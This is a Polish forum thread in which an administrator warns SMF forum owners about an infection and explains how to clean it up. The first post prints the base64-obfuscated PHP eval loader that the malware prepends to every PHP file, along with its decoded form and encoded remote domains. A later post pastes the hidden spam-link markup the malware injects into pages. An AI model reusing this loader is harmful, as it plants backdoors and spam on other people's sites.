Strony: [1] 2 3   Bottom Do dołu
   Drukuj   
ico Autor    
[EN] [ES] [PT] [IT] [DE] [FR] [NL] [TR] [SR] [RU]
     Topic: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!  [Przeczytany 41705 razy]
0 użytkowników i 1 Gość przegląda ten wątek.
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg630#msg630  
Witam, cześć i czołem.. Niestety jest powazna sprawa!


Pojawił się w sieci Exploit, który infekuje forum na skrypcie SMF.

Zainfekowaniu ulegają dosłownie wszystkie pliki z rozszerzeniem *.php w całym katalogu z SMF, łącznie z podkatalogami.

Procedura wykonania kodu polega, na tym, że niejaki:

krisbarteo

IP: 94.142.129.147

Nazwa hosta: 94.142.129.147

Email: krisbarteo@gmail.com

Nazwa użytkownika: krisbarteo


- zakłada konto, przechodzi procedurę rejestracyjną i prawdopodobnie za pomocą formularza
do wysyłania własnego Avatara na server, wkleja tam do formularza, złośliwy kod
lub wysyła na serwer spreparowany plik graficzny, który jest zupełnie czymś innym,
skutkiem czego ulega "zakażeniu" niekiedy parę setek plików.
Trzeba zajrzeć do katalogu Attachments i tam powinien być 1px plik np. Avatar85.jpg - do wywalenia!.

Exploit dopisuje na początku każdego napotkanego pliku, tj przed < ? php zakodowany kod,
który jest adresem instalki Exploida:

GeSHi -› Code: [select]
<?php /**/eval(base64_decode(&#39;aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdXNlcnMveHh4eHgvd3d3L3h4eHh4eC90cC9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy91c2Vycy94eHh4L3d3dy94eHh4eHgvdHAvRkNLZWRpdG9yL2VkaXRvci9maWxlbWFuYWdlci9icm93c2VyL2RlZmF1bHQvaW1hZ2VzL2ljb25zLzMyL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19&#39;)); ?>
<?php
// itd.. tu reszta w&#322;a&#347;ciwego pliku
?>
// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.027s | speed:45.88 KB/s



Po zdekodowaniu - kod wygląda tak:

GeSHi -› Code: [select]
<?php if(function_exists(&#39;ob_start&#39;)&&!isset($GLOBALS[&#39;sh_no&#39;])){$GLOBALS[&#39;sh_no&#39;]=1;if(file_exists(&#39;/users/xxxxx/www/xxxxxx/tp/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php&#39;)){include_once(&#39;/users/xxxx/www/xxxxxx/tp/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php&#39;);if(function_exists(&#39;gml&#39;)&&!function_exists(&#39;dgobh&#39;)){if(!function_exists(&#39;gzdecode&#39;)){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack(&#39;v&#39;,substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header(&#39;Content-Encoding: none&#39;);$c=gzdecode($b);if(preg_match(&#39;/\<body/si&#39;,$c)){return preg_replace(&#39;/(\<body[^\>]*\>)/si&#39;,&#39;$1&#39;.gml(),$c);}else{return gml().$c;}}ob_start(&#39;dgobh&#39;);}}} ?>
// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.031s | speed:30.98 KB/s



 Jak widać, (to akurat jest na SMF + TP, ale jak go nie ma to instaluje w innym miejscu), w tym wypadku instalka Exploita leci tu:

/users/xxxxx/www/xxxxxx/tp/FCKeditor/editor/filemanager/browser/default/images/icons/32/

Do środka jest wrzucony zakodowany plik: style.css.php

Teraz, kiedy w nagłówku każdego pliku *.php jest adres pliku style.css.php, to kiedy jesteśmy na forum i klikamy na różne linki i robimy różne rzeczy.. to w folderze z plikiem style.css.php - kolektują sią różne pliki, bez żadnego rozszerzenia. Głównie to reklamy kasyn i podobne duperschwanze.. Ale w śród tych plików ukrywa równiesz swoje configi.

itd itp ect, juz nie będę was zanudzał co dalej..

Jak się obronić?

- Trzeba sprawdzić czy na liście userów jest niejaki - krisbarteo i zbanować to konto, ale nie usuwać!

Trzeba dodac nowy ban, lub z konta tego "usera" kliknąć "zbanuj tego użytkownika"


I ban powinien wygladać tak:



Ale ostatnie pole wypełniamy tylko wtedy, kiedy faktycznie już jest zarejestrowany inaczej zostawiamy puste, bo wywali errora.
Tzn. nawet kiedy nie ma takiego usera, to dajemy "pusty" ban z dokładnie takimi wpisami jak na rysunku, ale bez ostatniego pola input

To sa wszystkie dane potrzebne do bana:

Nazwa Bana: krisbarteo

IP: 94.142.129.147

Nazwa hosta: 94.142.129.147

Email: krisbarteo@gmail.com

Nazwa użytkownika: krisbarteo


Jeśli to zrobią osoby, które administrują fora na skrypcie SMF, to unikną włamu.
Jeśli nie było jeszcze włamu, to należy skopiować na dysk całe forum.
- wtedy, jak się to zdarzy, należy np. zmienić nazwy katalogom, plikom i wrzucić pliki na serwer z kopii.

Jeśli to już się stało, to czeka nas kawał roboty, ponieważ należy pousuwać wszystkie złośliwe wpisy.
Ale kiedy mamy kopię, to zmieniamy nazwy plikom/folderom głównycm i podmieniamy pliki, jeśli nie,
- to kasacja obcych plików i edycja wszystkich plików *.php w całym głównym katalogu z forum.


Exploit jest przygotowany do zaspamowania forum linkami i opisami comercyjnych stron (kasyna itp).
Może również "kablować" wrażym twarzom na Litwę..:

ENCODE:

Code: [select]
ZGd1aA== = "aHR0cDovL25vbXNhdDIzLm5ldC87aHR0cDovL25zc2F0My5jb20vO2h0dHA6Ly93cGxzYXQyMy5uZXQv"



DECODE: (tego co powyżej)

Code: [select]
http://nomsat23.net/;http://nssat3.com/;http://wplsat23.net/



Należy się zabezpieczyć.

- Ban to podstawa, nawet kiedy nie ma jeszcze takiego usera, to i tak dokonujemy bana, tylko nie podajemy ostatniego pola.
- Należałoby zabronić userom, chocby tym podstawowym, wgrywania foty Avatara, tylko zostawić wybór z tego co jest.
- Trzeba kontrolować pliki, logi z servera, sprawdzać czy nie zarejestrował się nowy user o xywie krisbarteo i być czujnym.

Zbiera on niezłe żniwo.. http://www.google.pl/search?hl=pl&q=krisbarteo&btnG=Szukaj+w+Google&lr=&aq=f&oq=

Można też wgrać moda: http://custom.simplemachines.org/mods/index.php?mod=1547 ale są i inne.

Napisałem o tym, ponieważ jesteście na liście Exploita, ponieważ wyszukuje on fora SMF po stopce: Powered by SMF
http://www.google.pl/search?hl=pl&q=Powered+by+SMF&btnG=Szukaj+w+Google&lr=&aq=f&oq=
i jeszcze ~24 miliony stronek..

Okay, mam nadzieje, że ten wpis uratuje choć jedną duszę.

Pozdrawiam wszystkich
Roco



Attention! Testing modifications - Steam Profile

Last Edit: 10.05.2009 02:13:11 by: roco IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg631#msg631 Post #1 
Niestety ale rozprzestrzenia sie dosć szybko.. Chciałem ostrzec mojego przyjaciela Unicorna, który ma forum na skrypcie SMF, ale niestety został już zainfekowany.

To widać w podgladzie strony: (wkleję tylko ten kawałek, gdzie widać wredną robotę Exploita)

GeSHi -› Code: [select]
</head>
<body><div style="display:none"><!--130543624--><p>My team and I are led by the understanding that these efforts should be made systematically, through a package of legislative and regulatory, institutional and functional actions to achieve lasting and sustainable results in the combat against offences of&#160; <a href="http://forum.redwall-firewall.com/index.php/?etv=156">the daily 3 lottery</a>&#160; rules and regulations. <!--628390374--><p>Further communications will occur between you and the&#160; <a href="http://www.bttvalencia.com/index.php/?xmwa=103">new jersey cash 5 lottery results</a>&#160; only, without our intermediation. <!--436125521--><p>This article seeks to highlight some of the issues that should be taken into&#160; <a href="http://www.eriwebdesign.com/hummingbirdsystems/index.php/?ltdb=172">how to win on lottery tickets</a>&#160; during the ongoing debates around the cash-in-heists in South Africa. <!--323113706--><p>Cash&#160; <a href="http://terrakroma.com/forum/index.php/?zosw=153">monte carlo casino las vegas</a>&#160; machine - US Patent 5626821 from Patent Storm. <!--696514532--><p>Usually these loans cost (percentage-wise) much more then an average mortgage, often times up to twice what a regular&#160; <a href="http://www.smitalia.net/community/index.php/?luuq=117">the casino brawl reenact</a>&#160; does, plus high origination fees. <!--885401978--><p>This study sought to determine why some families live outside the government&#160; <a href="http://straightmusichouse.com/bbs/index.php/?yjfz=142">resort and casino tunica</a>&#160; income support system despite extreme poverty. <!--778589255--><p>Transparent&#160; <a href="http://forum.synesthesie.info/index.php/?jkbv=44">british new year lottery</a>&#160; reporting is essential for efficient resource allocation. <!--52513688--><p>The director of the new Johnny&#160; <a href="http://thekokiris.net/forum/index.php/?rysm=44">kenosha dog track</a>&#160; stage musical, "Ring of Fire," struggles to define exactly what the show is, but one thing is certain -- no one portrays the country music legend known as "The Man in Black. <!--221362381--><p>Check Cashing&#160; <a href="http://cymonsgames.retroremakes.com/pages/cursesexamples/magic.c/?hhdk=28">frequent winning lottery numbers</a>&#160; Advance, Check Cashing Service, yellow pages, New Haven,CT, directory, local search, phone directory, maps, directions, more information,local information, telephone directory, refine search. <!--166232151--><p>Five years of non-stop&#160; <a href="http://csshook.com/menudesign/wp-content/plugins/custom-anti-spam/custom_anti_spam.php/?bzf=99">casino free games</a>&#160; without any failure and breakdown is a strong argument, isn&#39;t it? <!--563266390--><p>The majority of products in most companies are&#160; <a href="http://www.bowenbaptist.org/forums/index.php/?buke=40">poker calculator on</a>&#160; traps. <!--531148499--><p>Given your attitude to risk, you have an ideal&#160; <a href="http://perfectillusions.net/dnl/download.php/?hrbi=182">iowa lottery authority</a>&#160; balance. <!--612217588--><p>At Central Car Loans, bad&#160; <a href="http://transvisionbike.com/comun/index.php/?ilpz=59">double eagle casino cripple creek colorado</a>&#160; history is no longer a hurdle. <!--383249644--><p>With the checkout operator in a sitting position, it was found that movement of the&#160; <a href="http://www.gelono.com/index.php/?irmw=169">blackjack free downloads</a>&#160; drawer from a closed to an open position interfered with the operator when in a sitting position. <!--215243964--><p>This article discusses recovering&#160; <a href="http://larrydavidfan.com/forum/index.php/?snb=90">party poker com</a>&#160; and ways to speed up payment after the invoice has been sent out to your customer. <!--211671441--><p>and means for controlling to drive the informing means when the number of&#160; <a href="http://www.plateau-trivial.de/smf/index.php/?dlcz=79">knut h flottorp</a>&#160; detected by the detecting means exceeds a predetermined standard value, the standard value being a positive integer greater than zero. <!--822230951--><p>However, the figures below are helpful as a basis for&#160; <a href="http://www.diaspora-isulana.com/forum/index.php/?wzdk=58">palace station hotel casino</a>&#160; planning. <!--443519299--><p>METHOD AND SYSTEM FOR&#160; <a href="http://eve-au.com/forum/index.php/?pfba=156">dream of winning the lottery</a>&#160; MAXIMIZATION CROSS REFERENCES TO RELATED APPLICATIONS This application is a continuation in part application of commonly owned U. <!--902978824--><p>Account have&#160; <a href="http://rightsoup.com/tag/cnn-iousa/?anu=62">massachusetts lottery site</a>&#160; other people infoassist in search repayment. <!--596192608--><p>For beef cattle businesses, this would be the third consecutive decline in average net&#160; <a href="http://www.motousers.or.id/index.php/?vtuv=35">usa green card lottery result</a>&#160; income since peaking in 2005 at ,200. <!--948553536--><p>American Life Solutions is a life settlement broker providing creative&#160; <a href="http://www.acuariolatino.com/foro/?xqsl=66">free betting accounts</a>&#160; and estate planning options. <!--234863264--><p>I held onto the&#160; <a href="http://www.thaidelltalk.com/index.php/?ssgt=133">deposit required online casino</a>&#160; until I saw (MSU President) Dr. <!--485286826--><p>Do you want to take a chance on making a lot of&#160; <a href="http://islandsofwar.com/forum/index.php/?iudt=44">tournament poker results</a>&#160; but risk making nothing at all? <!--252339626--><p>Congress, Giving&#160; <a href="http://gnepal.com/forum/index.php/?ywop=70">ceredo kenova high school</a>&#160; to Foreigners, Obama&#39;s Global Poverty Act, Obama, Global Poverty Act, S. <!--702678907--><p>Here we&#160; <a href="http://filmunderfire.com/forums/index.php/?aabf=78">bingo bonus deposit</a>&#160; both the origin of her blog&#39;s name and the fact that her willpower only has a 365 day shelf life. <!--425682949--><p>We are licensed real estate brokers, in business for over 35 years in&#160; <a href="http://www.ucdvo.org/plogger/ucdvo_gallery.php/?iuzv=88">expekt poker review</a>&#160; properties including residential, residential income, commercial, and land. <!--128315421--><p>top the internet&#160; <a href="http://www.theheritagehunters.com/forum/index.php/?vrfd=167">riviera casino las vegas nv</a>&#160; tables with impressive headline rates, they are notably absent from the consistency tables. <!--697321308--><p>The Petty&#160; <a href="http://heliciculture.escargot-blond-des-flandres.com/provence-alpes-cote-dazur/?lyrw=136">epiphone casino ebony</a>&#160; Fund custodian is responsible for ensuring proper safekeeping and handling of the fund. <!--722667181--><p>Contact us to find out how you can gain the benefits of&#160; <a href="http://www.robux.co.uk/games/forum/index.php/?jfdh=0">lottery commission annual report</a>&#160; receivable factoring for your business. <!--529213610--><p>hedging transaction, the&#160; <a href="http://www.heimbrauforum.de/index.php/?esyp=86">texas holdem poker tournament rules</a>&#160; is considered as being in that currency. <!--4734030--><p>In this paper we consider the question of how much our society is willing to spend to&#160; <a href="http://broncoii.org/forum/index.php/?cwni=8">understanding baseball betting lines</a>&#160; a life in various contexts. <!--751541121--><p>The&#160; <a href="http://newcastlegreengathering.co.uk/talk/index.php/?tigl=156">free online video poker slots</a>&#160; drawer system of claim 9 wherein the drawer is laterally movable when the drawer is latched to the second rail of the first slide and the second rail of the second slide. <!--748860300--><p>It&#39;s optimized for the search engines and ready for you to start making&#160; <a href="http://www.forum-psoriasis.com/forum/index.php/?yext=156">michigan casino list</a>&#160; NOW! <!--929633414--><p>For purposes of this policy the emphasis on controls will generally be related to the methods and practices necessary to ensure the safeguarding of University&#160; <a href="http://www.miss-barrymore.com/photos/thumbnails.php/?lbjf=27">california casinos craps</a>&#160; collections and change funds. <!--699126562--><p>After the deposit of&#160; <a href="http://www.leolog.com/2006/10/26/mechero-con-linux/?show_page=37">of harrah casino</a>&#160; and the giving of any change, the drawer is pushed back by the operator to close the till in preparation for further actuation of the keys in the next transaction. <!--169057327--><p>FRIDAY, March 7 (HealthDay News) -- Extra government&#160; <a href="http://www.robertkazinsky.org/forum/chat/admin/connlist.php/?djlz=168">poker superstars two</a>&#160; support of poor families boosts children&#39;s physical and mental development, a U. <!--922447893--><p>Why is the&#160; <a href="http://islamemlinha.com/index.php/?ehqk=166">online betting wiki</a>&#160; flow from operating activities relevant? <!--831198880--><p>We can provide branded indoor, outdoor and mobile&#160; <a href="http://www.fibertothewhatever.com/wikifiber/index.php/?bmfk=125">sandia casino ampitheater</a>&#160; machines for placement at your location. <!--220320452--><p>Ampminsure is a community that offers a participatory platform to discuss over&#160; <a href="http://www.raqsoft.com/forum/index.php/?xzzl=55">paris hotel and casino</a>&#160; related issues amidst a knowledgeable and experienced community. <!--634936683--><p>As yet, the harmonisation of regional&#160; <a href="http://www.bbloom.com/bbloomforum/index.php/?mwle=120">ruined leather scraps</a>&#160; and fiscal legislations remains to be done. <!--727993085--><p>calculates a sum value of the mean value and the numerical data of the degrees of influence of the quality factors as a predicted value of the demanded&#160; <a href="http://apiariocosmos.com.br/forum/index.php/?qklq=180">all no deposit casinos</a>&#160; amount. <!--325328556--><p>We charge a monthly interest on the&#160; <a href="http://thesluice.co.uk/forums/index.php/?pasq=48">video poker strategy</a>&#160; and you can reclaim your goods at any time within 7 months. <!--747136598--><p>A resident of Little Canada won the ,599 Northstar&#160; <a href="http://venicefla.us/forums/index.php/?wedk=121">online casino playtech</a>&#160; jackpot from the Sept. <!--461298572--><p>We also propose a scheme, transferable untraceable electronic&#160; <a href="http://www.mhooclub.com/webboard/index.php/?wxhi=172">e lottery international</a>&#160; scheme, satisfying transferability as well as the above two criteria. <!--340777660--><p>This type of loans can be repaid earlier than the maturity and provide&#160; <a href="http://www.fdd5-25.net/idtcpu.php/?wnuy=134">sandia casino albuquerque nm</a>&#160; availability to firms. <!--35306814--><p>Bloomberg European Central&#160; <a href="http://netfield.ludost.net/forum/index.php/?dpyv=74">and strole lottery</a>&#160; President Jean Claude Trichet signaled that he. <!--522794580--><p>Full reporting schools that classify&#160; <a href="http://basquet.deuruguay.com.uy/backend.php/?frup=36">casino first gambling web</a>&#160; deposits as investments are also to provide information about the weighted average effective interest rate and maturity dates. <!--398575917--><p>Usually they are always there to help their&#160; <a href="http://www.pinscher.no/forum/index.php/?imgx=138">for sale kenova wv</a>&#160; with special considerations, which may not be used in emergencies. <!--768283378--><p>Slots online super jackpot party, atlantic lounge casino, poker no deposit bouns, no deposit rtg casino codes, new online casino free&#160; <a href="http://replaygamez.com/forum/index.php/?mft=12">play pchlotto com</a>&#160; coupons. <!--13787321--><p>This provides the highest flexibility to changing&#160; <a href="http://carpetcleanerrental.net/robots.txt/?fmse=136">football betting magazines</a>&#160; conditions. </div>
<div style="width: 99%; border-left: 1px solid #826D54; border-right: 1px solid #826D54; margin: 0px auto;">
<table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>
&#160; &#160; <td width="100%" class="logo" style="background-image: url([url]http://cybertrash.netarteria.pl/cyber/Themes/bluefantasy/images/header_bg.gif[/url])">
// Created by GeSHi 1.0.8.10 | code: -› [code=HTML] | load:0.033s | speed:369.69 KB/s



Polecam się zabezpieczyć. ("gumka" nie wystarczy na ten syf...)

Pozdrawiam
roco



Attention! Testing modifications - Steam Profile

Last Edit: 10.05.2009 02:15:00 by: roco IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg632#msg632 Post #2 
Dopiero niedawno co wybrałem ten skrypt a już on zaczyna być strzelnicą.


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg633#msg633 Post #3 
To niezupełnie tak.. Skrypt SMF, jest bezpieczniejszy niż IPB, który jest płatny i kosztuje więcej niż system operacyjny..
Wszystko co jest w necie nie jest bezpiczne i każy kto zamieszcza jakieś treści musi się liczyć z tym, że zostanie zhackowany, lub jego dzieła będą wyświetlane gdzie indziej.

Mi się wydaje, że ten exploid, to raczej taki test, przed czymś może grubszym...


Jeśli już stwierdzimy, że zostaliśmy zainfekowani, to należy skopiować, to co jest w stringu, pomiędzy a'postrofami i rozkodowanie, albo za bomocą Notepad++, lub za pomocą generatorka on-line, np. tu: http://www.generuj.pl/ lub np. tu: http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

Chodzi o to, żeby zobaczyć, gdzie Exploit instaluje swój szajs, a widac to po rozkodowaniu. i wtedy czyszczenie zaczynamy, właśnie od tego miejsca.

Wycinamy te wszystkie pliki bez rozszerzeń ale również pliki:

- style.css.php
- dg.php
- s.php

Dopiero później edytujemy każdy z plików php i wycinamy to co na samym początku powklejał Exploit.
Jest z tym masę pracy, można ją zautomatyzować, jeśli ktos ma kopię wszystkich plików, po zainstalowaniu ostatniego moda, czy skórki, żeby było aktualne. Wtedy zmieniamy nazwy katalogów, np. dopisujac coś na końcu np.: Sources na >> Sources01 i wrzucamy z naszej kopi forum cały ten katalog... itd. Inaczej ręcznie musimy wyedytować każdy! dosłownie, kazdy plik php i usunąć fajans.

Pozdrawiam
roco

PS. Informacje które tu zamieściłem, pochodzą stąd, że mnie to spotkało osobiście, mam ponad 20 for na skrypcie smf i jedno zostało zaatakowane, choć @krisbarteo zarejestrował się u mnie na kilku. Rozkminiłem o co biega, rozkodowałem wpisy i go zwalczyłem. Napewno można spotkać info na temat tego Exploida w necie, jednak to co tu zostało opisane, przytrafiło mi się osobiście, zresztą wielu moim przyjaciołom również i natychmiast o tym napisałem. Mam nadzieję, że zrobią to również inni...

Zgadzam się na kopiowanie, dawanie linków i udostepnianie tego topa!
To ważne info dla wszystkich Adminów skryptu SMF i powinno o tym wiedzieć jak najwięcej osób!
Jeśli są jakieś pytania, to prosze pytać, nawet nie trzeba się rejestrować.
r.



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg634#msg634 Post #4 
Czyli rozumiem tak on atakuje tylko gdy się zarejestruje i tylko w sposób wysyłania awatara na nasz serwer z forum lub plików na forum.
Zbanowanie adresu i niedopuszczenie go do rejestracji a także zabronienie userom wgrywania awatarów (mogą powiedzmy używać tylko z zewnętrznych źródeł) ochrania nas tak jakby. Czy się mylę?


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg635#msg635 Post #5 
Exactly!

Żeby mógł wykonać kod, to musi skorzystać z formularza, którym można wrzucić plik do katalogu attachmens. Tam trafia 1px spreparowana grafika, ale to kit. Chodzi o rozpakowanie kontenerka z syfem. Potrzebne są jeszcze warunki, żeby wykonywał się kod. Jak ich nie ma, to są tylko zaśmiecone pliki php.., kiedy się wykona, to masz powyżej próbkę.. co robi. Wrzuca do kodu strony ostylowanego do ukrywania diva: div style = " display:none " i tego nie widzisz, ale z zainfekowanej stronki lecą linki z opisami np. do stronek komercyjnych z ksynami itp.
itd..

Napisałem wyżej, dokładnie, - jak sobie z tym poradzić. Oczywiście to mogą być i inne dane, ponieważ na tym IP były i inne klocki, ale nie związane z bierzącym zagrożeniem. Można zablokować pulę adresów.

To wszystko, oczywiście robi nam kłopot, choćby dlatego, że wyjdzie kolejna łata, tylko z łatką na taką możliwość i trzeba będzie uaktualniać...

Tomeh, do wszytkich takich akcji, należy podchodzić z rezerwą. Kiedy robisz regularnie optymalizacje, kopie bezpieczeństwa - bazy i po każdej zmianie czyli zainstalowanie nowego moda, stylu, - kopię wszytkich plików, - to nie wiele może się satać, poza robotą naprawczą hehe

Pozdrawiam
roco



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg637#msg637 Post #6 
to mam takie pytanie.

Mam tak że rejestracja musi być zatwierdzona przez adamina i widzę że zarejestrował się ten krisbarteo ale nie zatwierdziłem jego rejestracji ani nie zrobiłem jeszcze nic. Użytkownicy u mnie mogą mieć awatary tylko z zewnętrznego źródła. Co powinienem teraz zrobić. Wystarczy że nie zatwierdzę i usunę go czy coś innego. Czy koniecznie muszę coś tam banować i se zaśmiecać w ten sposób forum. Rejestrować mi się on może a ja  będę usuwał to. Moje forum to bardziej blog i nie chodzi tam o użytkowników bo to coś innego dlatego nie ma obawy że mam tak poustawiane wszystko a userzy będą źli.

Po za tym dziwne że nikt go nie złapał jak łamie prawo ciągle na tym samym adresie itp.

Ok czekam na odpowiedź  -dzięki.


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg639#msg639 Post #7 
Ten Exploit, poza pracą do wykonania, nie wywołuje większych szkód. Nie znam motywów, ale może powstał po to, żeby zwrócic uwagę na niedociągnięcia smf? A może w innym celu, np. żebyśmy się bali i siali panikę wokół?

Znalazłem parę dni temu trochę czasu i poczytałem tamtejsze tipsy.. (na smf.org, bo na smf.pl nawet nikt bąka nie puści.. w temacie), jak dla mnie to bzdura! Wręcz uważem, że to byłoby niegrzeczne z mojej strony w stosunku do moich userów, gdybym to wysztko powyłączał w psizdu..

Tomeh, mówię Ci nie masz co pekać, jest ok! keep smiling

Wystarczy, ten mod, o którym pisałem wyżej, a min akceptacja przez admina nowych rejestracji. Po za tym możesz utworzyć grupę "przedszkolną" i tam zazwolić im tylko na trochę. Jak większość ma avki to spox, a jak by kto chciał to możesz mu sam uploadować na swoich uprawnieniach. jednak myślę, że to to nie jest konieczne. Bybór avka tylko z tego co już tam masz, lub sam wrzuciłeś, a nie z zewnątrz!, ponieważ to też nie jest pewne, choc z innych powodów.

Po pierwsze dodaj nawet "pustego" bana (czyli bez 4 pola), tak jak podałem to wyżej.
Jeśli się pojawił i czeka na akceptację, to mu jej nie dajesz a on dalej czeka.. To wyszkolony spambocik i pójdzie po prostu dalej. Wyszukuje ofiary za pomocą googlary po stopce, co też możnaby unieszkodliwić, tylko, że to działanie długoterminowe, jeśli już zostałes zaindexowany. no i p[rzedewszystki to szkodliwe dla właściciela forum.. w sensie SEO...

Nie usuwaj go, bo to tak jakbyć wyczyścił tablice w szkole z kredy, jest znowu czysta i można po niej pisać.
Pisałem o tu, ja go nie usunąłem, tylko zbanowałem..

A jak go usuniesz, to sam dajesz mu możliwość przyjścia ponownie.. to chyba logiczne, nieprawdaż?

Można dodać jego IP jako zabroniony do pliku .htaccess, (pisałem o tym w topiku "Spambots.."), tylko wtedy nie będziesz nawet wiedział, że krisbarteo coś próbował u Ciebie, a jak dasz bana, nawet pustego, to w tabelce pojawi się liczba "trafień", czyli wiadomo by było ile razy próbował i czy w ogóle....

Mozna się zabezpieczyć, alebo biernie czekać aż przyjdzie, a jesli hmm nie zabraknie mu prądu w jego akumulatorach, to będzie dotąd się przemieszczał, aż odwiedzi wszystko to co może znaleźć np. w google..

W sumie to taki joke.., małe bzi.., trochę pracy,? dla wprawy? hehe
- ale dosłownie Każdy musi się liczyć, że jest możliwym, iż do niego zawita ta maszynka! Nie tylko dotyczy to skryptu SMF, również Joomli! i wszystkich CMS'ów, które korzystają z FCKedytora, lub dają możliwość rejestracji i wrzuty własnego avka z dysku..

To tyle.. nie ma co pękać, ale przygotować się warto i jest hmm mądrze..?

Pozdrawiam
roco



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg649#msg649 Post #8 
W końcu przyszła długo oczekiwana aktualizacja (20.05).
Sporo drobnych i zastarzałych zmian, może trochę utrudniać, ale i tak zmany były konieczne!
Zozwiązane problemy z bezpieczeństwem nie tylko z ostatnim Exploitem.

Polecam wszyskim Adminom SMF jak najszybszą aktualizację! Oczywiście, jeśli macie wcześniejsze wersje, to należy uaktualniać etapami, czyli po kolei, aż do ostatniej. To ważne inaczej smf odmówi wam współracy..

Wszystkie pakiety, (gdyby coś nie szło normalnym trybem), znajdziecie tu: http://download.simplemachines.org/

Aktualizacja dotyczy:

SMF: - v 1.1.8 >> v 1.1.9

oraz

SMF: - v 2.0 RC1 >> v 2.0 RC1.1

Najgorzej, gdy ktoś sam poprawia pliki jak np. ja hehe, wtedy są problemy z aktualką, ale spoko!
Jeśli będą problemy, to piszcie.

Pozdrawiam
roco



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg650#msg650 Post #9 
Ale jak to uaktualnić z 1.1.8 do tego 1.1.9 ściągam paczkę large upgrade tak i co dalej. W dziale modyfikacje link do uaktualnia oczywiście mi nie działa 404 forbiden wyskakuje. Nie wiem co robić aby to uaktualnić.


IP IP Zapisane
Administrator
*****
Imagination is more Important than Knowledge
Offline
08.05.2017 21:24:16
Topic Starter
 United States Mężczyzna
United States
  WWW
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg651#msg651 Post #10 
Ależ.. masz na czerwono w PA, zaraz nad info z smf.org ew. kiedy klikniesz na pakiety.
